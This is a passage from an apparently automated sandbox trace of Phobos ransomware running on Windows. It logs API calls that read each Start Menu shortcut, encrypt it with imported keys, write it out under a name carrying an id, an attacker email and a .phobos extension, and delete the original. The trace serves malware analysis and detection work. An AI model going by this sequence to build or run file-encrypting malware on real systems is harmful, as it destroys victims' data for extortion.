dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.628] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.628] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0176.628] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.628] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0176.628] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.628] CloseHandle (hObject=0x194) returned 1 [0176.628] CloseHandle (hObject=0x158) returned 1 [0176.628] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Resource Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\resource monitor.lnk")) returned 1 [0176.634] SetEvent (hEvent=0xe8) returned 1 [0176.634] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.634] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Restore.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system restore.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.635] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1246) returned 1 [0176.635] CloseHandle (hObject=0x158) returned 1 [0176.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Restore.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system restore.lnk")) returned 0x20 [0176.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Restore.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system restore.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.635] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Restore.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system restore.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.635] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.635] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.635] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Restore.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system restore.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.638] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.638] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.638] ReadFile (in: hFile=0x158, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4de, lpOverlapped=0x0) returned 1 [0176.686] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4e0, dwBufLen=0x4e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4e0) returned 1 [0176.686] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4e0, lpOverlapped=0x0) returned 1 [0176.687] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.687] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.687] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0176.687] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.687] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0176.687] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.688] CloseHandle (hObject=0x158) returned 1 [0176.688] CloseHandle (hObject=0x194) returned 1 [0176.688] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Restore.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system restore.lnk")) returned 1 [0176.689] SetEvent (hEvent=0xe8) returned 1 [0176.689] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.689] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer Reports.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer reports.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.690] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1320) returned 1 [0176.690] CloseHandle (hObject=0x194) returned 1 [0176.690] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer Reports.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer reports.lnk")) returned 0x20 [0176.690] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer Reports.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer reports.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.690] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer Reports.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer reports.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.690] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.690] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.690] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer Reports.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer reports.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.691] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.691] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.691] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x528, lpOverlapped=0x0) returned 1 [0176.702] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x530, dwBufLen=0x530 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x530) returned 1 [0176.702] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x530, lpOverlapped=0x0) returned 1 [0176.703] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.703] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.703] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0176.703] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.703] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0176.703] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.703] CloseHandle (hObject=0x194) returned 1 [0176.703] CloseHandle (hObject=0x158) returned 1 [0176.704] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer Reports.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer reports.lnk")) returned 1 [0176.705] SetEvent (hEvent=0xe8) returned 1 [0176.705] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.705] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\ShapeCollector.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\shapecollector.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.706] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1436) returned 1 [0176.706] CloseHandle (hObject=0x158) returned 1 [0176.706] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\ShapeCollector.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\shapecollector.lnk")) returned 0x20 [0176.706] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\ShapeCollector.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\shapecollector.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.706] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\ShapeCollector.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\shapecollector.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.706] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.706] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.706] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\ShapeCollector.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\shapecollector.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.707] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.707] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.707] ReadFile (in: hFile=0x158, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x59c, lpOverlapped=0x0) returned 1 [0176.718] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5a0, dwBufLen=0x5a0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5a0) returned 1 [0176.718] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5a0, lpOverlapped=0x0) returned 1 [0176.832] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0176.832] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.832] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0176.832] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.832] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0176.832] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.832] CloseHandle (hObject=0x158) returned 1 [0176.832] CloseHandle (hObject=0x194) returned 1 [0176.832] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\ShapeCollector.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\shapecollector.lnk")) returned 1 [0176.833] SetEvent (hEvent=0xe8) returned 1 [0176.834] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.834] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.835] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1468) returned 1 [0176.835] CloseHandle (hObject=0x194) returned 1 [0176.835] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise.lnk")) returned 0x20 [0176.835] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.836] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.836] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.836] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.836] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.836] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.836] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.836] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5bc, lpOverlapped=0x0) returned 1 [0176.843] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5c0, dwBufLen=0x5c0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5c0) returned 1 [0176.843] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5c0, lpOverlapped=0x0) returned 1 [0176.844] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0176.844] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.844] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0176.844] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.844] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0176.844] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.844] CloseHandle (hObject=0x194) returned 1 [0176.844] CloseHandle (hObject=0x158) returned 1 [0176.844] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise.lnk")) returned 1 [0176.845] SetEvent (hEvent=0xe8) returned 1 [0176.846] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.846] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\wordpad.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.846] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1322) returned 1 [0176.846] CloseHandle (hObject=0x158) returned 1 [0176.846] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\wordpad.lnk")) returned 0x20 [0176.846] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\wordpad.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.846] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\wordpad.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.846] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.847] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.847] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\wordpad.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.847] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.847] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.847] ReadFile (in: hFile=0x158, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x52a, lpOverlapped=0x0) returned 1 [0176.851] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x530, dwBufLen=0x530 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x530) returned 1 [0176.851] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x530, lpOverlapped=0x0) returned 1 [0176.852] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0176.852] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.852] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0176.852] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.852] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0176.852] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.852] CloseHandle (hObject=0x158) returned 1 [0176.852] CloseHandle (hObject=0x194) returned 1 [0176.852] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start 